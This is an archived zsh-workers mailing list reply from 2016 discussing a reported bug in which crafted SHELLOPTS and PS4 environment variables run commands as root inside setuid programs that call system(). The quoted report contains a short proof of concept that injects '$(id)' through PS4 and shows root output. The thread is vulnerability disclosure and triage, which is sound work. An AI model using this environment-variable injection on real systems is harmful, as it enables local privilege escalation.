Zsh Mailing List Archive
Messages sorted by:
Reverse Date,
Date,
Thread,
Author
Re: BUG: crafting SHELLOPTS and PS4 allows to run arbitrary programs in setuid binaries using system
- X-seq: zsh-workers 39457
- From: Daniel Shahaf <d.s@xxxxxxxxxxxxxxxxxx>
- To: Mateusz Lenik <mlen@xxxxxxx>
- Subject: Re: BUG: crafting SHELLOPTS and PS4 allows to run arbitrary programs in setuid binaries using system
- Date: Tue, 27 Sep 2016 07:53:47 +0000
- Cc: zsh-workers@xxxxxxx
- Dkim-signature: v=1; a=rsa-sha1; c=relaxed/relaxed; d=	daniel.shahaf.name; h=cc:content-transfer-encoding:content-type	:date:from:in-reply-to:message-id:mime-version:references	:subject:to:x-sasl-enc:x-sasl-enc; s=mesmtp; bh=E6RhQ6L/ztuHFrZl	6UmhnZSPtoM=; b=hhm0R3LQFk3H55OezJEDiYtpa/TDEiI6iclB6SohsV/hgbBm	A6hSgztIs3UJb9Divsn1cEqCS6GKA91DPF9xF/601bLGqpcXxcgFthXp9fgjIxqo	P1u1yAv4Vl5OuGNYyKtQ001gBK7hwLCIH8CFHxeOpVr2CxxdT7i6uaN7YZA=
- Dkim-signature: v=1; a=rsa-sha1; c=relaxed/relaxed; d=	messagingengine.com; h=cc:content-transfer-encoding:content-type	:date:from:in-reply-to:message-id:mime-version:references	:subject:to:x-sasl-enc:x-sasl-enc; s=smtpout; bh=E6RhQ6L/ztuHFrZ	l6UmhnZSPtoM=; b=WdAm5bYjbq6/QPLL6d/NtEkj6XO6B92cLQQburovcaqPyDu	NoJNDxZ28PmfNR1VyTmUgacBKqVvGYhZZD3lTOOB2USfyCHvdgllbMJwI1KaXBH4	UtRMpZuWud5TPLLgrDufEJ8brlK9AoRRt9Y8ytA8e04apfOgKbPODQp/jTTk=
- In-reply-to: <CALDAOts+rgsuZfABkgVBphvY4CLcUiMLFA4xR0bUXPNxnhcHug@mail.gmail.com>
- List-help: <mailto:zsh-workers-help@zsh.org>
- List-id: Zsh Workers List <zsh-workers.zsh.org>
- List-post: <mailto:zsh-workers@zsh.org>
- Mailing-list: contact zsh-workers-help@xxxxxxx; run by ezmlm
- References: <CALDAOts+rgsuZfABkgVBphvY4CLcUiMLFA4xR0bUXPNxnhcHug@mail.gmail.com>
Mateusz Lenik wrote on Tue, Sep 27, 2016 at 06:59:18 +0000:
> % gcc -xc - -otest <<< 'int main() { setuid(0); system("/bin/date"); }'
> % sudo chown root:root test
> % sudo chmod 4755 test
> % env -i SHELLOPTS=xtrace PS4='$(id)' ./test
> uid=0(root) gid=... groups=.../bin/date
> Tue Sep 27 08:49:16 CEST 2016
I can't reproduce that either either 5.0.7 or latest master, even with
«setopt promptsubst» in effect.  (Does it reproduce in 'zsh -f'?)
> % zsh --version
> 
> zsh 5.2 (x86_64-pc-linux-gnu)
> %
> 
> The solution that bash folks implemented is to drop PS4 from env when the
> shell is ran as root.
34015 (89012cf94ca) stopped importing non-ASCII envvars.  There may have
been other changes in this area but I couldn't quickly find them.
Thanks for the report,
Daniel
Messages sorted by:
Reverse Date,
Date,
Thread,
Author